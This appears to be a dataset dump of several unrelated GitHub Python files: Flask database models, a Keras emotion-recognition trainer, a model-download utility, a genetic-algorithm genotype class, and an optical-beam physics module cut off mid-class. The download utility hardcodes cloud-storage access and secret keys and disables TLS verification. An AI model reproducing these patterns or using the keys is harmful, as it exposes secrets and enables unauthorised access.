res\n\n\n","repo_name":"TJJTJJTJJ/leetcode","sub_path":"113.path-sum-ii.py","file_name":"113.path-sum-ii.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"26781700377","text":"from flask_sqlalchemy import SQLAlchemy\nfrom flask import Flask\nfrom flast_test.apps.database.postgres.connection import get_connection_str\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = get_connection_str()\ndb = SQLAlchemy(app)\n\n\nclass Products(db.Model):\n    # __tablename__ = \"products\"\n\n    asin = db.Column(\"asin\", db.String(60), primary_key=True, unique=True)\n    title = db.Column(db.String(300))\n    # review = db.relationship('ProductReview', 
backref='products')\n\n    def __repr__(self):\n        return f'<Products {self.title}>'\n\n\nclass ProductReview(db.Model):\n    # __tablename__ = \"product_review\"\n\n    id = db.Column('review_id', db.Integer, primary_key=True)\n    asin = db.Column(db.String(60), db.ForeignKey(\"products.asin\"))\n    title = db.Column(db.String(300))\n    review = db.Column(db.String(10000))\n    product = db.relationship(\"Products\", backref=\"productreview\")\n\n    def __repr__(self):\n        return f'<ProductReview {self.title}>'\n\n\ndb.create_all()","repo_name":"Mrwhite113/flast_test","sub_path":"apps/database/postgres/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"71982500646","text":"import os\nimport time\nfrom configparser import ConfigParser\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras.layers import Convolution2D, MaxPooling2D, Dense, Flatten, Dropout\nfrom keras.models import Sequential\nfrom keras.utils.np_utils import to_categorical\n\nfrom custom_callbacks import LogTraining\nfrom data_generator import data_generator, datagen_horizontal_flip\n\nK.set_image_dim_ordering('th')\n# Magic...\ntf.python.control_flow_ops = tf\n\nconfig = ConfigParser()\nconfig.read(\"config.ini\")\n\nAUGMENT_BRIGHTNESS = config.get(\"training\", \"augmentBrightness\")\nAUGMENT_SHADOWS = config.get(\"training\", \"augmentShadows\")\n\nDATA_FOLDER_PATH = \"./data\"\nTRAIN_X_PATH = os.path.join(DATA_FOLDER_PATH, \"X_train.npy\")\nTRAIN_Y_PATH = os.path.join(DATA_FOLDER_PATH, \"Y_train.npy\")\nTEST_X_PATH = os.path.join(DATA_FOLDER_PATH, \"X_test.npy\")\nTEST_Y_PATH = os.path.join(DATA_FOLDER_PATH, \"Y_test.npy\")\n\nSAVE_MODEL_FOLDER_PATH = \"./savedModel\"\nCHECKPOINT_FOLDER_PATH = os.path.join(SAVE_MODEL_FOLDER_PATH, \"trainCheckpoints\")\nVISUALIZATION_FOLDER_PATH = os.path.join(SAVE_MODEL_FOLDER_PATH, \"visualization\")\n\n# Train data\n# X: (n_samples, rows, cols)\n# Y: (n_samples, n_category)\nX_train = np.load(TRAIN_X_PATH).astype(np.uint8)\n# Load and one-hot-encode the labels\ny_train = to_categorical(np.load(TRAIN_Y_PATH).astype(np.uint8))\n\nprint(\"X shape: {0}\\nY shape: {1}\".format(X_train.shape, y_train.shape))\n\n# original shape: (rows, cols)\nimage_shape = (X_train.shape[1], X_train.shape[2])\n# train data shape: (1, rows, cols)\ntrain_image_shape = (1,) + image_shape\n\nprint(\"Image shape: {0}\".format(image_shape))\nprint(\"Train image shape: {0}\".format(train_image_shape))\nprint(\"Output layer dim: {0}\".format(y_train.shape[1]))\n\nbatch_size = 64\nsamples_per_epoch = 20480\nnb_epoch = 10\n\nmodel = Sequential()\nmodel.add(Convolution2D(32, 3, 3, border_mode='same', activation='elu', input_shape=train_image_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, 3, 3, border_mode='same', activation='elu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(64, 3, 3, border_mode='same', activation='elu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(128, 3, 3, border_mode='same', activation='elu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024, activation='elu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(512, activation='elu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(y_train.shape[1], activation='softmax'))\n\n# Uncomment this if you would like to continue a training from a 
checkpoint:\n\n# existing_model_weights_path = os.path.join(SAVE_MODEL_FOLDER_PATH, \"model_weights_10_epochs.h5\")\n# if os.path.exists(existing_model_weights_path):\n# print(\"Loading weights...\")\n# model.load_weights(existing_model_weights_path)\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\ncheckpoint = ModelCheckpoint(os.path.join(CHECKPOINT_FOLDER_PATH, \"weights-{epoch:02d}-{loss:.2f}-{acc:.2f}.hdf5\"),\n monitor=\"loss\",\n save_best_only=True,\n save_weights_only=True)\nlog_training = LogTraining(os.path.join(VISUALIZATION_FOLDER_PATH, \"training_log_{0}_epochs.txt\".format(nb_epoch)))\ntensorboard = TensorBoard(log_dir=os.path.join(SAVE_MODEL_FOLDER_PATH, \"tensorboard_logs\"), histogram_freq=0,\n write_graph=False, write_images=True)\ncallbacks = [checkpoint, log_training, tensorboard]\n\nstartTime = time.clock()\nhist = model.fit_generator(\n data_generator(batch_size, X_train, y_train, image_data_generator=datagen_horizontal_flip, augment_brightness=AUGMENT_BRIGHTNESS,\n augment_shadows=AUGMENT_SHADOWS),\n samples_per_epoch=samples_per_epoch, nb_epoch=nb_epoch,\n verbose=1,\n callbacks=callbacks)\nendTime = time.clock()\n\nprint(\"Model is trained in {0} seconds!\".format(endTime - startTime))\n\n# Saving the trained model\n\nprint(\"Saving model...\")\nmodelJson = model.to_json()\nwith open(os.path.join(SAVE_MODEL_FOLDER_PATH, \"model_structure.json\"), \"w\") as json_file:\n json_file.write(modelJson)\nmodel.save_weights(os.path.join(SAVE_MODEL_FOLDER_PATH, \"model_weights_{0}_epochs.h5\".format(nb_epoch)))\nmodel.save(os.path.join(SAVE_MODEL_FOLDER_PATH, \"trained_model_{0}_epochs.h5\".format(nb_epoch)))\nprint(\"Model is saved!\")\n\n# Model evaluation\n\nprint(\"Evaluating the model...\")\nX_test = np.load(TEST_X_PATH).astype(np.float16)\n# Prepare data for evaluation\nX_test = np.reshape(X_test, (X_test.shape[0], 1, X_test.shape[1], X_test.shape[2]))\ny_test = to_categorical(np.load(TEST_Y_PATH).astype(np.uint8))\nmetrics = model.evaluate(X_test, y_test, batch_size=batch_size, verbose=1)\nprint(\"Metrics: {0}\".format(metrics))\nprint(\"Model loss: {0}\".format(metrics[0]))\nprint(\"Model acc: {0}\".format(metrics[1]))\n\n# Visualize the training\n\nplt.figure(figsize=(15, 10))\nplt.plot(hist.history['loss'])\nplt.title(\"Model loss\")\nplt.xlabel(\"epoch\")\nplt.legend(['loss'], loc='upper left')\nplt.savefig(os.path.join(VISUALIZATION_FOLDER_PATH, \"train_loss_visualization_{0}_epochs.png\".format(nb_epoch)))\n\nplt.figure(figsize=(15, 10))\nplt.plot(hist.history['acc'])\nplt.title(\"Model acc\")\nplt.xlabel(\"epoch\")\nplt.legend(['acc'], loc='upper left')\nplt.savefig(os.path.join(VISUALIZATION_FOLDER_PATH, \"train_acc_visualization_{0}_epochs.png\".format(nb_epoch)))\n","repo_name":"gaborvecsei/Emotion-Recognition","sub_path":"train_emotion_recognizer.py","file_name":"train_emotion_recognizer.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"27710896496","text":"# -*- encoding: utf-8 -*-\n'''\n@File : download.py\n@Time : 2022/06/05 17:08:29\n@Author : Ming Ding \n@Contact : dm18@mails.tsinghua.edu.cn\n'''\n\n# here put the import lib\nimport os\nimport sys\nimport math\nimport random\nimport requests\nimport threading\nfrom tqdm import tqdm\nfrom filelock import FileLock\nfrom .urls import MODEL_URLS\n\ndef download_with_progress_bar(save_path, url, chunk_size=2048):\n resume_header = None\n file_size_downloaded 
= 0\n\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n\n if os.path.exists(save_path):\n file_size_downloaded = os.path.getsize(save_path)\n resume_header = {'Range': f'bytes={file_size_downloaded}-'}\n\n response = requests.get(url, stream=True, headers=resume_header)\n total_size = int(response.headers.get('content-length', 0)) + file_size_downloaded\n if total_size == file_size_downloaded:\n return\n \n with open(save_path, 'ab') as file:\n with tqdm(total=total_size, unit='B', unit_scale=True, desc=save_path, initial=file_size_downloaded) as pbar:\n for chunk in response.iter_content(chunk_size=chunk_size):\n if chunk:\n file.write(chunk)\n pbar.update(len(chunk))\n\ndef auto_create(name, *, path=None, url=None):\n if path is None:\n path = os.getenv('SAT_HOME', '~/.sat_models')\n path = os.path.expanduser(path)\n model_path = os.path.join(path, name)\n if url == 'local':\n return model_path\n os.makedirs(os.path.dirname(model_path), exist_ok=True)\n lock = FileLock(model_path + '.lock', mode=0o777)\n with lock:\n if url is None:\n url = MODEL_URLS[name]\n if os.path.isdir(model_path) and not url.startswith('r2://'):\n pass\n elif os.path.isdir(model_path) and url.startswith('r2://') and url.endswith('.zip'):\n pass\n else:\n print(f'Downloading models {url} into {path} ...')\n try:\n if url.startswith('r2://'):\n download_s3(path, url[5:])\n else:\n file_path = os.path.join(path, name + '.zip')\n download_with_progress_bar(file_path, url)\n except Exception as e:\n print(f'Failed to download or check, if you already had the zip file, please unzip it manually as {model_path}!')\n raise e\n # unzip\n if not os.path.isdir(model_path):\n import zipfile\n file_path = os.path.join(path, name + '.zip')\n print(f'Unzipping {file_path}...')\n f = zipfile.ZipFile(file_path, 'r')\n f.extractall(path=path)\n assert os.path.isdir(model_path), f'Unzip failed, or the first-level folder in zip is not {name}.'\n return model_path # must return outside the `with lock` block\n\nSAT_ACCOUNT = 'c8a00746a80e06c4632028e37de24d6e'\nSAT_ACCESS_KEY = 'eb4d69e273848089c7f9b9599cdcd983'\nSAT_SECRET_KEY = '367e9b21fef313f187026320016962b47b74ca4ada7d64d551c43c51e195d7a5'\nSAT_BUCKET = 'sat'\n\ndef download_s3(local_dir, remote_uri):\n '''Download remote_dir into (under) local_dir\n '''\n import boto3\n s3_resource = boto3.resource('s3',\n endpoint_url = f'https://{SAT_ACCOUNT}.r2.cloudflarestorage.com',\n aws_access_key_id = f'{SAT_ACCESS_KEY}',\n aws_secret_access_key = f'{SAT_SECRET_KEY}'\n )\n client = boto3.client('s3',\n endpoint_url = f'https://{SAT_ACCOUNT}.r2.cloudflarestorage.com',\n aws_access_key_id = f'{SAT_ACCESS_KEY}',\n aws_secret_access_key = f'{SAT_SECRET_KEY}',\n verify=False\n )\n bucket = s3_resource.Bucket(SAT_BUCKET) \n transfer_config = boto3.s3.transfer.TransferConfig(\n use_threads=True,\n multipart_threshold=8*1024*1024,\n max_concurrency=64,\n multipart_chunksize=8*1024*1024,\n )\n # remote_uri is file\n if '.' 
in os.path.basename(remote_uri):\n        bucket.download_file(remote_uri, os.path.join(local_dir, os.path.basename(remote_uri)), Callback=ProgressPercentage(client, SAT_BUCKET, remote_uri), Config=transfer_config)\n        return\n    # uri is path\n    remote_dir = remote_uri\n    # prefix up to (and including) the slash in front of remote_dir's last component,\n    # so key_suffix keeps that last component and everything below it\n    key_prefix = '/'.join(remote_dir.split('/')[:-1])\n    if key_prefix:\n        key_prefix += '/'\n    for obj in bucket.objects.filter(Prefix = remote_dir):\n        key_suffix = obj.key[len(key_prefix):] # remote_dir/xxx/xxx.zip\n        target_dir = os.path.join(local_dir, os.path.dirname(key_suffix))\n        if not os.path.exists(target_dir):\n            os.makedirs(target_dir)\n        # skip if exists\n        if os.path.exists(os.path.join(local_dir, key_suffix)) and os.path.getsize(os.path.join(local_dir, key_suffix)) == obj.size:\n            continue\n        bucket.download_file(obj.key, os.path.join(local_dir, key_suffix), Callback=ProgressPercentage(client, SAT_BUCKET, obj.key), Config=transfer_config) \n\n\nclass ProgressPercentage(object):\n    ''' Progress Class\n    Class for calculating and displaying download progress\n    '''\n    def __init__(self, client, bucket, filename):\n        ''' Initialize\n        initialize with: file name, file size and lock.\n        Set seen_so_far to 0. Set progress bar length\n        '''\n        self._filename = filename\n        self._size = client.head_object(Bucket=bucket, Key=filename)['ContentLength']\n        self._seen_so_far = 0\n        self._lock = threading.Lock()\n        self.prog_bar_len = 80\n\n    def __call__(self, bytes_amount):\n        ''' Call\n        When called, increments seen_so_far by bytes_amount,\n        calculates percentage of seen_so_far/total file size \n        and prints progress bar.\n        '''\n        # To simplify we'll assume this is hooked up to a single filename.\n        with self._lock:\n            self._seen_so_far += bytes_amount\n            ratio = round((float(self._seen_so_far) / float(self._size)) * (self.prog_bar_len - 6), 1)\n            current_length = int(round(ratio))\n\n            percentage = round(100 * ratio / (self.prog_bar_len - 6), 1)\n\n            bars = '+' * current_length\n            output = bars + ' ' * (self.prog_bar_len - current_length - len(str(percentage)) - 1) + str(percentage) + '% ' + self.convert_bytes(self._seen_so_far) + ' / ' + self.convert_bytes(self._size) + ' ' * 5\n\n            if self._seen_so_far != self._size:\n                sys.stdout.write(output + '\\r')\n            else:\n                sys.stdout.write(output + '\\n')\n            sys.stdout.flush()\n\n    def convert_bytes(self, num):\n        ''' Convert Bytes\n        Converts bytes to scaled format (e.g KB, MB, etc.)\n        '''\n        step_unit = 1000.0\n        for x in ['bytes', 'KB', 'MB', 'GB', 'TB', 'PB']:\n            if num < step_unit:\n                return \"%3.1f %s\" % (num, x)\n            num /= step_unit\n    \n","repo_name":"THUDM/SwissArmyTransformer","sub_path":"sat/resources/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","stars":743,"dataset":"github-code","pt":"52"}
{"seq_id":"30856216654","text":"import random\nfrom random import randint\nfrom typing import Tuple, Optional, List\n\nimport numpy as np\n\nfrom evolutionary_optimization.genotype.genotype_model.abstract_genotype import AbstractGenotype\nfrom evolutionary_optimization.genotype.genotype_model.genotype_utils import single_point_crossover\n\n\nclass IntegerListGenotype(AbstractGenotype):\n\n    def __init__(\n        self,\n        genotype: Optional[List[int]] = None,\n        mutation_probability: float = 0.1,\n        ratio_of_population_for_crossover: float = 0.5,\n        number_of_genes: int = 1,\n        value_range: Tuple[int, int] = (-10000, 10000),\n    ):\n        \"\"\"Initialise instance of AbstractGenotype.\n\n        Args:\n            genotype: genotype used for mutation, crossover and to calculate phenotype_value.\n            mutation_probability: probability of a 
gene mutating.\n ratio_of_population_for_crossover: ratio of population used for crossover when updating population.\n number_of_genes: number of genes in the genotype.\n value_range: minimum and maximum values of a gene.\n \"\"\"\n self._genotype = genotype\n self.mutation_probability = mutation_probability\n self.ratio_of_population_for_crossover = ratio_of_population_for_crossover\n self.number_of_genes = number_of_genes\n self.value_range = value_range\n\n @property\n def genotype(self):\n \"\"\"Genotype value used for evaluation of phenotype.\"\"\"\n return self._genotype\n\n @genotype.setter\n def genotype(self, value):\n \"\"\"Genotype attribute setter.\"\"\"\n self._genotype = value\n\n @classmethod\n def build_random_genotype(\n cls,\n number_of_genes: int = 1,\n value_range: Tuple[int, int] = (-10000, 10000),\n mutation_probability: Optional[float] = 0.5,\n ratio_of_population_for_crossover: Optional[float] = 0.5,\n ) -> \"IntegerListGenotype\":\n \"\"\"Builds random genotype attribute based on requirements.\n\n Args:\n number_of_genes: number of genes in the genotype.\n value_range: minimum and maximum values of a gene.\n mutation_probability: probability of a gene mutating.\n ratio_of_population_for_crossover: ratio of population used for crossover when updating population.\n\n Returns:\n Genotype object with updated genotype attribute.\n\n Todo:\n * (Marta): set infinity as value range defaults\n \"\"\"\n genotype = []\n\n for i in range(number_of_genes):\n new_gene = randint(value_range[0], value_range[1])\n genotype.append(new_gene)\n\n return cls(\n genotype=genotype,\n mutation_probability=mutation_probability,\n ratio_of_population_for_crossover=ratio_of_population_for_crossover,\n number_of_genes=number_of_genes,\n value_range=value_range,\n )\n\n @classmethod\n def from_genotype(cls, base_genotype: \"IntegerListGenotype\", new_genotype: List[int]) -> \"IntegerListGenotype\":\n \"\"\"Create a new genotype using the parameters of an existing genotype.\"\"\"\n return cls(\n genotype=new_genotype,\n value_range=base_genotype.value_range,\n mutation_probability=base_genotype.mutation_probability,\n ratio_of_population_for_crossover=base_genotype.ratio_of_population_for_crossover,\n )\n\n def mutate(self):\n \"\"\"In place modification of the genotype by randomly changing genes based on mutation probability.\"\"\"\n new_genotype = []\n\n for gene in self.genotype:\n mutation = np.random.choice([True, False], p=[self.mutation_probability, 1 - self.mutation_probability])\n\n if mutation:\n noise = random.uniform(-1, 1)\n if noise > 0:\n new_gene = gene + 1\n else:\n new_gene = gene - 1\n else:\n new_gene = gene\n\n new_genotype.append(new_gene)\n self.genotype = new_genotype\n\n def crossover(\n self,\n parent_2_genotype: \"IntegerListGenotype\",\n ) -> Tuple[\"IntegerListGenotype\", \"IntegerListGenotype\"]:\n \"\"\"Performs single point crossover operation for 1 set of parents.\n\n A random integer is generated to split the genotype of the two individuals -\n this is the gene slice index. Then two child genotypes are generated with the complementary parts\n of the parent genotypes. 
+{"seq_id":"69878697444","text":"# -*- coding: utf-8 -*-\n\"\"\"Beam module belonging to the optical forces master's degree project\n\nThis module provides classes which define some optical beams, such as\nthe Bessel beam or Frozen Waves. So far, the following beams are implemented:\n    - Plane Wave\n    - Bessel Beam\n    - Gaussian Beam\n    - Bessel-Gauss Beam\n    - Bessel-Gauss Beam superposition\n    - Frozen Waves\n\nExample:\n    ...\n\nTodo:\n    * Create all docstrings\n\n.. 
Project:\n https://github.com/arantespp/opticalforces\n\n\"\"\"\n\nimport math as ma\nfrom math import pi\nimport cmath as cm\nimport copy\nimport scipy.special as ss\nfrom scipy.integrate import quad\nimport numpy as np\n\n\n# Speed of light.\nSPEED_OF_LIGHT = 299792458\nVACUUM_PERMEABILITY = pi*4e-7\n\n\ndef derivative(func, x0):\n '''This method makes the phase derivative in x, y and z using Fi-\n nite Difference Coefficients found on\n http://web.media.mit.edu/~crtaylor/calculator.html site.'''\n\n # Delta\n h = 1e-9\n\n # Denominator coefficient\n den = 12*h\n\n # Locations of Sampled Points\n lsp = [-2, -1, 1, 2,]\n\n # Finite Difference Coefficients\n fdc = [1, -8, 8, -1]\n\n # Delta\n '''h = 1e-9\n\n # Denominator coefficient\n den = 60*h\n\n # Locations of Sampled Points\n lsp = [-3, -2, -1, 0, 1, 2, 3]\n\n # Finite Difference Coefficients\n fdc = [-1, 9, -45, 0, 45, -9, 1]'''\n\n return np.dot(fdc, [func(x0+i*h) for i in lsp])/den\n\n\nclass Beam(object):\n \"\"\" This class has all properties and methods that a specific scalar\n beam should have.\n\n \"\"\"\n generic_params = ('_vacuum_wavelength',\n '_vacuum_wavenumber',\n '_medium_refractive_index',\n '_wavelength',\n '_wavenumber',)\n\n amp_pha_params = ('_amplitude',\n '_phase',)\n\n intrinsic_params = ()\n\n params = amp_pha_params + generic_params + intrinsic_params\n\n def __init__(self, beams, name='generic-scalar-beam'):\n self.beams = beams\n self.name = name\n\n if isinstance(beams, list) is True:\n self._vacuum_wavelength = beams[0].vacuum_wavelength\n self._vacuum_wavenumber = beams[0].vacuum_wavenumber\n self._medium_refractive_index = beams[0].medium_refractive_index\n self._wavelength = beams[0].wavelength\n self._wavenumber = beams[0].wavenumber\n else:\n self._vacuum_wavelength = None\n self._vacuum_wavenumber = None\n self._medium_refractive_index = None\n self._wavelength = None\n self._wavenumber = None\n\n self._amplitude = 1\n self._phase = 0\n\n def __str__(self):\n out = 'name: ' + self.name + '\\n'\n\n # print amplitude and phase\n for param in self.amp_pha_params:\n out += ' ' + param + ': ' + str(self.__dict__[param])\n out += '\\n'\n\n # print generic params\n for param in self.generic_params:\n out += ' ' + param + ': ' + str(self.__dict__[param])\n out += '\\n'\n\n for param in self.intrinsic_params:\n out += ' ' + param + ': ' + str(self.__dict__[param])\n out += '\\n'\n\n if len(self.beams) > 1:\n # print beams\n for i, beam in enumerate(self.beams):\n out += '\\n' + 'beam %d (%d)' %(i+1, i-len(self.beams)//2)\n out += ': %s' %beam.name\n out += '\\n'\n\n for param in beam.amp_pha_params:\n out += ' ' + param + ': ' + str(beam.__dict__[param])\n out += '\\n'\n\n for param in beam.intrinsic_params:\n out += ' ' + param + ': ' + str(beam.__dict__[param])\n out += '\\n'\n\n return out\n\n def __add__(self, other):\n # raise error if one generic params if different from another.\n if self.wavelength != other.wavelength:\n raise NameError('Beams with differents wavelength')\n if self.vacuum_wavelength != other.vacuum_wavelength:\n raise NameError('Beams with differents vacuum_wavelength')\n\n # effetuate the sum because all generic params are equal.\n beams = []\n\n for beam in self.beams:\n if len(self.beams) > 1:\n beam._amplitude *= self._amplitude\n beam._phase += self._phase\n beams.append(copy.copy(beam))\n\n for beam in other.beams:\n if len(other.beams) > 1:\n beam._amplitude *= other._amplitude\n beam._phase += other._phase\n beams.append(copy.copy(beam))\n\n return Beam(beams)\n\n 
@property\n    def amplitude(self):\n        return self._amplitude\n\n    @amplitude.setter\n    def amplitude(self, value):\n        self._amplitude = value\n\n    @property\n    def phase(self):\n        return self._phase\n\n    @phase.setter\n    def phase(self, value):\n        self._phase = value\n\n    # ----- vacuum -----\n\n    @property\n    def vacuum_wavelength(self):\n        return self._vacuum_wavelength\n\n    @vacuum_wavelength.setter\n    def vacuum_wavelength(self, wl0):\n        self._vacuum_wavelength = wl0\n\n        if self.vacuum_wavenumber is None:\n            self.vacuum_wavenumber = 2*pi/wl0\n\n        if (self.medium_refractive_index is not None\n                and self.wavelength is None):\n            self.wavelength = wl0/self.medium_refractive_index\n\n        if (self.medium_refractive_index is None\n                and self.wavenumber is not None):\n            # n = k*wl0/(2*pi); the previous expression mistakenly used the medium wavelength here\n            self.medium_refractive_index = wl0*self.wavenumber/(2*pi)\n\n    @property\n    def vacuum_wavenumber(self):\n        return self._vacuum_wavenumber\n\n    @vacuum_wavenumber.setter\n    def vacuum_wavenumber(self, k0):\n        self._vacuum_wavenumber = k0\n\n        if self.vacuum_wavelength is None:\n            self.vacuum_wavelength = 2*pi/k0\n\n        if (self.medium_refractive_index is not None\n                and self.wavenumber is None):\n            self.wavenumber = k0*self.medium_refractive_index\n\n        if (self.medium_refractive_index is None\n                and self.wavelength is not None):\n            self.medium_refractive_index = 2*pi/(k0*self.wavelength)\n\n    # ----- medium -----\n\n    @property\n    def wavelength(self):\n        return self._wavelength\n\n    @wavelength.setter\n    def wavelength(self, wl):\n        self._wavelength = wl\n\n        if self.wavenumber is None:\n            self.wavenumber = 2*pi/wl\n\n        if (self.medium_refractive_index is not None\n                and self.vacuum_wavelength is None):\n            self.vacuum_wavelength = wl*self.medium_refractive_index\n\n        if (self.medium_refractive_index is None\n                and self.vacuum_wavenumber is not None):\n            k0 = self.vacuum_wavenumber\n            self.medium_refractive_index = 2*pi/(wl*k0)\n\n    @property\n    def wavenumber(self):\n        return self._wavenumber\n\n    @wavenumber.setter\n    def wavenumber(self, k):\n        self._wavenumber = k\n\n        if self.wavelength is None:\n            self.wavelength = 2*pi/k\n\n        if (self.medium_refractive_index is not None\n                and self.vacuum_wavenumber is None):\n            self.vacuum_wavenumber = k/self.medium_refractive_index\n\n        if (self.medium_refractive_index is None\n                and self.vacuum_wavelength is not None):\n            self.medium_refractive_index = (k*self.vacuum_wavelength/(2*pi))\n\n    # ----- medium refractive index -----\n\n    @property\n    def medium_refractive_index(self):\n        return self._medium_refractive_index\n\n    @medium_refractive_index.setter\n    def medium_refractive_index(self, nm):\n        self._medium_refractive_index = nm\n\n        if (self.vacuum_wavelength is None\n                and self.wavelength is not None):\n            self.vacuum_wavelength = self.wavelength*nm\n\n        if (self.vacuum_wavelength is not None\n                and self.wavelength is None):\n            self.wavelength = self.vacuum_wavelength/nm\n\n        if (self.vacuum_wavenumber is None\n                and self.wavenumber is not None):\n            self.vacuum_wavenumber = self.wavenumber/nm\n\n        if (self.vacuum_wavenumber is not None\n                and self.wavenumber is None):\n            self.wavenumber = self.vacuum_wavenumber*nm\n\n    def is_all_params_defined(self):\n        for param, value in self.__dict__.items():\n            if value is None and param[0] == '_':\n                return False\n        return True\n\n    def psi(self, x1, x2, x3, system='cartesian'):\n        return (self._amplitude*cm.exp(1j*self._phase)\n                *sum([beam.psi(x1, x2, x3, system) for beam in self.beams]))\n\n    def intensity(self, x1, x2, x3, system='cartesian'):\n        \"\"\" Wave's intensity.\n\n        Args:\n\n        Returns:\n            Wave's intensity.\n\n        \"\"\"\n        return 
abs(self.psi(x1, x2, x3, system))**2\n\n def wavenumber_direction(self, x1, x2, x3, system='cartesian'):\n \"\"\" k0 vector's direction.\n\n k0 vector's direction is defined by gradient of phase function.\n\n Args:\n point (:obj:'Point'): point at which want to calculate\n wave's k0 vector's direction.\n\n Returns:\n A list containing the normalized k0 vector - [kx, ky, kz]\n \"\"\"\n\n # k0 components\n (x0, y0, z0) = Point(x1, x2, x3, system).cartesian()\n psi = self.psi(x0, y0, z0, system)\n k0x = (derivative(lambda x: self.psi(x, y0, z0, system), x0)/psi).imag\n k0y = (derivative(lambda y: self.psi(x0, y, z0, system), y0)/psi).imag\n k0z = (derivative(lambda z: self.psi(x0, y0, z, system), z0)/psi).imag\n\n if (ma.isinf(k0x) is True\n or ma.isinf(k0y) is True\n or ma.isinf(k0z) is True):\n return (0, 0, 0)\n\n if (ma.isnan(k0x) is True\n or ma.isnan(k0y) is True\n or ma.isnan(k0z) is True):\n return (0, 0, 0)\n\n # normalize k0 vector\n if k0x != 0 or k0y != 0 or k0z != 0:\n k = [k0x, k0y, k0z]\n absk = np.linalg.norm(k)\n return (k0x/absk, k0y/absk, k0z/absk)\n return (0, 0, 0)\n\n def electric_field_direction(self, x1, x2, x3, system='cartesian'):\n return [0, 1, 0]\n\n\nclass ScalarPlaneWave(Beam):\n intrinsic_params = ()\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, **kwargs):\n Beam.__init__(self, self)\n\n self.beams = [self]\n self.name = 'scalar-plane-wave'\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n def psi(self, x1, x2, x3, system='cartesian'):\n \"\"\" Wave's equation 'psi'.\n\n Args:\n\n Returns:\n Wave's equation complex value of default plane wave decla-\n red on beam class.\n\n \"\"\"\n if system == 'cartesian' or system == 'cylindrical':\n z = x3\n else:\n z = Point(x1, x2, x3, system).z\n\n return (self._amplitude*cm.exp(1j*self._phase)\n *cm.exp(-1j*self._wavenumber*z))\n\n\nclass ScalarBesselBeam(Beam):\n intrinsic_params = ('_longitudinal_wavenumber',\n '_transversal_wavenumber',\n '_bessel_spot',\n '_axicon_angle',\n '_axicon_angle_degree',\n '_bessel_order',)\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, **kwargs):\n Beam.__init__(self, self)\n\n self.beams = [self]\n self.name = 'scalar-bessel-beam'\n\n self._transversal_wavenumber = None\n self._longitudinal_wavenumber = None\n self._bessel_spot = None\n self._axicon_angle = None\n self._axicon_angle_degree = None\n self._bessel_order = 0\n\n # use to determine which variable was setted first\n self.spot_krho_first = None\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n @property\n def wavenumber(self):\n return self._wavenumber\n\n @wavenumber.setter\n def wavenumber(self, k):\n self._wavenumber = k\n\n if self.wavelength is None:\n self.wavelength = 2*pi/k\n\n if (self.medium_refractive_index is not None\n and self.vacuum_wavenumber is None):\n self.vacuum_wavenumber = k/self.medium_refractive_index\n\n if (self.medium_refractive_index is None\n and self.vacuum_wavelength is not None):\n self.medium_refractive_index = (k*self.vacuum_wavelength/(2*pi))\n\n if self.longitudinal_wavenumber is not None:\n kz = self.longitudinal_wavenumber\n\n if self.transversal_wavenumber is None:\n self.transversal_wavenumber = ma.sqrt(k**2 - kz**2)\n\n if self.axicon_angle is None:\n self.axicon_angle = ma.acos(kz/k)\n\n if self.transversal_wavenumber is not None:\n krho = self.transversal_wavenumber\n\n if self.longitudinal_wavenumber is None:\n self.longitudinal_wavenumber = 
ma.sqrt(k**2 - krho**2)\n\n            if self.axicon_angle is None:\n                self.axicon_angle = ma.asin(krho/k)\n\n        if self.axicon_angle is not None:\n            theta = self.axicon_angle\n\n            if self.longitudinal_wavenumber is None:\n                self.longitudinal_wavenumber = k*ma.cos(theta)\n\n            if self.transversal_wavenumber is None:\n                self.transversal_wavenumber = k*ma.sin(theta)  # fixed: 'k.ma.sin(theta)' was an attribute-access typo\n\n    @property\n    def longitudinal_wavenumber(self):\n        return self._longitudinal_wavenumber\n\n    @longitudinal_wavenumber.setter\n    def longitudinal_wavenumber(self, kz):\n        self._longitudinal_wavenumber = kz\n\n        if self.transversal_wavenumber is not None:\n            krho = self.transversal_wavenumber\n            self.wavenumber = ma.sqrt(kz**2 + krho**2)\n\n        if self.axicon_angle is not None:\n            theta = self.axicon_angle\n            if theta != pi/2:\n                self.wavenumber = kz/ma.cos(theta)\n\n        if self.wavenumber is not None:\n            self.wavenumber = self.wavenumber\n\n    @property\n    def transversal_wavenumber(self):\n        return self._transversal_wavenumber\n\n    @transversal_wavenumber.setter\n    def transversal_wavenumber(self, krho):\n        self._transversal_wavenumber = krho\n\n        if krho != 0:\n            self._bessel_spot = ss.jn_zeros(self.bessel_order, 1)[0]/krho\n        else:\n            self._bessel_spot = ma.inf\n\n        if self.longitudinal_wavenumber is not None:\n            kz = self.longitudinal_wavenumber\n            self.wavenumber = ma.sqrt(kz**2 + krho**2)\n\n        if self.axicon_angle is not None:\n            theta = self.axicon_angle\n            if theta != 0:\n                self.wavenumber = 